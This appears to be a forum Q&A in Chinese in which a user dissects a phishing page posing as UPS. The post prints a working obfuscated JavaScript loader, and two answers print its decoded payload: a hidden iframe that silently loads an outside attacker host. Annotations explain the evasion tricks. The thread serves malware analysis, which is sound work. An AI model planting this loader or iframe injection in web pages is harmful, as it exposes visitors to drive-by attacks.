
我收到一封电子邮件,其中包含一个看起来像是 UPS 的链接(我打开它是因为我昨晚订购了一些东西。时机不好。)

这是一个简单的网页,显然不是 UPS,但我查看了 HTML,其中嵌入了以下脚本。

// Obfuscated loader exactly as embedded in the phishing page. Do NOT run it
// outside an isolated VM / throwaway browser profile: the last statement hands
// the decoded text to eval(). The decoded payload (shown in the answers below)
// injects a hidden iframe pointing at an external host.
// Note: every variable here is an implicit global (no var/let), which is one
// reason the script only works in sloppy mode.
try {
    // appendChild() requires a Node; passing a string throws a TypeError, so
    // control always falls into the catch below. Presumably an anti-analysis
    // trick aimed at scanners that only look at the try body.
    q = document.createElement("p");
    q.appendChild(q + "");
} catch (qw) {
    // 012 is a legacy octal literal (decimal 10), so h === -2. Legacy octal
    // is a SyntaxError in strict mode, i.e. this file must run sloppy.
    h = -012 / 5;
    try {
        // `prototype` is an undeclared identifier -> ReferenceError, which
        // again forces execution into the inner catch.
        prototype - 1;
    } catch (bawg) {
        ss = [];                                  // turns into a string on the first `+` below
        f = (h) ? ("fromCharC" + "ode") : "";     // h is -2 (truthy) -> "fromCharCode"
        e = window["e" + "val"];                  // e === window.eval, split to dodge a grep for "eval"
        // Encoded payload: each entry is a char code multiplied by a factor
        // that depends on its position (1,2,3,4 repeating; see the loop).
        n = [9, 18, 315, 408, 32, 80, 300, 444, 99, 234, 327, 404, 110, 232, 138, 412, 101, 232, 207, 432, 101, 218, 303, 440, 116, 230, 198, 484, 84, 194, 309, 312, 97, 218, 303, 160, 39, 196, 333, 400, 121, 78, 123, 364, 48, 186, 123, 492, 13, 18, 27, 36, 105, 204, 342, 388, 109, 202, 342, 160, 41, 118, 39, 36, 9, 250, 96, 404, 108, 230, 303, 128, 123, 26, 27, 36, 9, 200, 333, 396, 117, 218, 303, 440, 116, 92, 357, 456, 105, 232, 303, 160, 34, 120, 315, 408, 114, 194, 327, 404, 32, 230, 342, 396, 61, 78, 312, 464, 116, 224, 174, 188, 47, 194, 351, 464, 111, 196, 333, 468, 114, 194, 297, 428, 121, 92, 330, 404, 116, 94, 327, 388, 105, 220, 138, 448, 104, 224, 189, 448, 97, 206, 303, 244, 48, 202, 147, 396, 98, 114, 294, 220, 49, 202, 306, 192, 50, 98, 294, 200, 39, 64, 357, 420, 100, 232, 312, 244, 39, 98, 144, 156, 32, 208, 303, 420, 103, 208, 348, 244, 39, 98, 144, 156, 32, 230, 348, 484, 108, 202, 183, 156, 118, 210, 345, 420, 98, 210, 324, 420, 116, 242, 174, 416, 105, 200, 300, 404, 110, 118, 336, 444, 115, 210, 348, 420, 111, 220, 174, 388, 98, 230, 333, 432, 117, 232, 303, 236, 108, 202, 306, 464, 58, 96, 177, 464, 111, 224, 174, 192, 59, 78, 186, 240, 47, 210, 306, 456, 97, 218, 303, 248, 34, 82, 177, 52, 9, 18, 375, 52, 9, 18, 306, 468, 110, 198, 348, 420, 111, 220, 96, 420, 102, 228, 291, 436, 101, 228, 120, 164, 123, 26, 27, 36, 9, 236, 291, 456, 32, 204, 96, 244, 32, 200, 333, 396, 117, 218, 303, 440, 116, 92, 297, 456, 101, 194, 348, 404, 69, 216, 303, 436, 101, 220, 348, 160, 39, 210, 306, 456, 97, 218, 303, 156, 41, 118, 306, 184, 115, 202, 348, 260, 116, 232, 342, 420, 98, 234, 348, 404, 40, 78, 345, 456, 99, 78, 132, 156, 104, 232, 348, 448, 58, 94, 141, 388, 117, 232, 333, 392, 111, 234, 342, 388, 99, 214, 363, 184, 110, 202, 348, 188, 109, 194, 315, 440, 46, 224, 312, 448, 63, 224, 291, 412, 101, 122, 144, 404, 49, 198, 294, 228, 98, 110, 147, 404, 102, 96, 150, 196, 98, 100, 117, 164, 59, 204, 138, 460, 116, 242, 324, 404, 46, 236, 315, 460, 
        105, 196, 315, 432, 105, 232, 363, 244, 39, 208, 315, 400, 100, 202, 330, 156, 59, 204, 138, 460, 116, 242, 324, 404, 46, 224, 333, 460, 105, 232, 315, 444, 110, 122, 117, 388, 98, 230, 333, 432, 117, 232, 303, 156, 59, 204, 138, 460, 116, 242, 324, 404, 46, 216, 303, 408, 116, 122, 117, 192, 39, 118, 306, 184, 115, 232, 363, 432, 101, 92, 348, 444, 112, 122, 117, 192, 39, 118, 306, 184, 115, 202, 348, 260, 116, 232, 342, 420, 98, 234, 348, 404, 40, 78, 357, 420, 100, 232, 312, 156, 44, 78, 147, 192, 39, 82, 177, 408, 46, 230, 303, 464, 65, 232, 348, 456, 105, 196, 351, 464, 101, 80, 117, 416, 101, 210, 309, 416, 116, 78, 132, 156, 49, 96, 117, 164, 59, 26, 27, 36, 9, 200, 333, 396, 117, 218, 303, 440, 116, 92, 309, 404, 116, 138, 324, 404, 109, 202, 330, 464, 115, 132, 363, 336, 97, 206, 234, 388, 109, 202, 120, 156, 98, 222, 300, 484, 39, 82, 273, 192, 93, 92, 291, 448, 112, 202, 330, 400, 67, 208, 315, 432, 100, 80, 306, 164, 59, 26, 27, 36, 125];
        // 6-2-1-2-1 === 0 and the condition is i !== 617, so i runs 0..616.
        // window.document is the only environment check: outside a browser
        // (e.g. plain Node) the script throws before reaching eval.
        if (window.document) for (i = 6 - 2 - 1 - 2 - 1; - 617 + i != 2 - 2; i++) {
            k = i;
            // h*h === 4, so the divisor is (i % 4) + 1 and n[i] / divisor is the
            // plain char code; String.fromCharCode turns it back into text.
            ss = ss + String[f](n[k] / (i % (h * h) + 2 - 1));
        }
        // eval() of the reconstructed string. To inspect instead of execute,
        // point `e` at console.log (or push into an array) before this line.
        e("if(1)" + ss);
    }
}

我不是要求任何人为我解码脚本,但可以使用哪些工具来确定实际发生了什么?我是一名 C# 程序员,不会做太多 javascript。我假设它正在构建某种代码,然后执行。有没有办法可以追踪它以查看它正在构建什么?

谢谢




只需执行这段代码,但先把 `e = window["e" + "val"];` 换成 `e = console.log;`,这样解码出来的字符串会被打印出来而不是交给 eval 执行。请在一次性的浏览器配置或隔离的虚拟机里做这件事,并且不要访问打印结果里出现的那个 URL。

结果:

    // Decoded payload; the leading "if (1)" is the prefix the loader prepends
    // before eval. If <body> has already been parsed, inject the iframe via
    // the DOM; otherwise fall back to document.write() so it still lands
    // while the page is being parsed.
    if (1) if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    // Same hidden 10x10 iframe, written as raw HTML. The src is the
    // attacker-controlled page — do not browse to it, even from a lab machine.
    document.write("<iframe src='http://autobouracky.net/main.php?page=0e1cb9b71ef021b2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
// Builds the hidden iframe programmatically: 10x10, visibility:hidden,
// absolutely positioned at the top-left corner, so the victim sees nothing
// while the remote page loads. The `page=` token is presumably a
// campaign/victim identifier — unverified from this sample alone.
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://autobouracky.net/main.php?page=0e1cb9b71ef021b2');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    // Appending to <body> is what actually triggers the load of the remote URL.
    document.getElementsByTagName('body')[0].appendChild(f);
}

按照 Graham 的建议使用 jsbeautifier,你会发现一行

e("if(1)" + ss);

其中 `e = window.eval`,而 `ss` 就是解码后的脚本——所以把那一行替换为

console.log(ss);

然后在 Firebug 控制台里运行整段代码。瞧。(注意脚本用 `window.document` 判断自己是否运行在浏览器里,在 Node 这类没有 `window` 的环境下会直接抛异常;要么在一次性的浏览器配置/隔离虚拟机里运行,要么先给 `window` 和 `document` 打桩。)


编码后的 javascript 解码之后如下所示:

// Decoded payload. If <body> has already been parsed, inject the iframe via
// the DOM; otherwise fall back to document.write() so it still lands while
// the page is being parsed.
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    // Same hidden 10x10 iframe, written as raw HTML. The src is the
    // attacker-controlled page — do not browse to it, even from a lab machine.
    document.write("<iframe src='http://autobouracky.net/main.php?page=0e1cb9b71ef021b2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
// Builds the hidden iframe programmatically: 10x10, visibility:hidden,
// absolutely positioned at the top-left corner, so the victim sees nothing
// while the remote page loads. The `page=` token is presumably a
// campaign/victim identifier — unverified from this sample alone.
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://autobouracky.net/main.php?page=0e1cb9b71ef021b2');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    // Appending to <body> is what actually triggers the load of the remote URL.
    document.getElementsByTagName('body')[0].appendChild(f);
}